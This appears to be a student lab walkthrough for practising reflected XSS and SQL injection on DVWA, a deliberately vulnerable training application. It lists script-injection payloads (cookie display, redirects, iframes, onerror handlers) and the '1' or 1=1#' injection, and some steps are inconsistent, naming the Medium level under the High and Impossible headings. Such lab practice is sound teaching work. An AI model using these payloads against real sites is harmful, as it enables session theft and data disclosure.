(XSS and SQL attack)

1. Click on Create/Reset Database.
2. Here, enter the username as admin and password as password. & login

Performing XSS Attacks
▪ Security Level: Low
1. Now go to DVWA Security and select security level as low and click on submit.
2. Now go to XSS(Reflected) and execute the following commands to mimic various xss attacks.
        1. Send an alert message to the user.
        <script>alert("Your Data is at risk")</script>
        
        2. Show cookie session value of document.
        <script>alert(document.cookie)</script> 
        
        3. Redirect user to some malicious site.
        <script>window.location="http://testphp.vulnweb.com/login.php"</script>
        
        4. Create a script to extract the absolute URI of website.
        <script>alert(document.baseURI)</script>
        
        5. Show an error as hacked when try to accessed unknown image
        <img src=abc.jpeg onerror=alert("Hacked")>
        
        6. Find out the parent URL link of another website.
        <script>alert(document.referrer)</script>
        
        7. Create a script to resize a window.
        <script>new_window = window.open('’,’',height=200,width=400); 
        new_window.resizeTo(800,800);</script>

        <script> new_window= window.open('', height=200, width=400); 
        new_window.resizeTo(800,800);</script>

        8. Create a new frame that redirect to vulnerable website.
        <iframe src="http://testphp.vulnweb.com/"> </iframe>

Same for 
▪ Security Level: Medium & 
▪ Security Level: High 

Performing Sql injection
▪ Security Level : Low
1. Now go to DVWA Security and select security level as low and click on submit.
2. Now go to sql injection and execute the following commands.

1. Here, the data for id =1 is shown.
   1

Here, 1’ or 1=1# is always true, hence data records where id is any value are displayed.
   1' or 1=1#

▪ Security Level : Medium
1. Now go to DVWA Security and select security level as Medium and click on submit.
2. Now go to sql injection and select commands.
1. Here, the data for id =2 is shown.
   2
2. Here, the data for id =1 is shown.
   1

▪ Security Level : High
1. Now go to DVWA Security and select security level as Medium and click on submit.
2. Now go to sql injection and click on change your ID.
   1' or 1=1#
3. Session ID
   5

▪ Security Level : Impossible
1. Now go to DVWA Security and select security level as Medium and click on submit.
2. Now go to sql injection and enter query.
   1’ or 1=1#  
   5
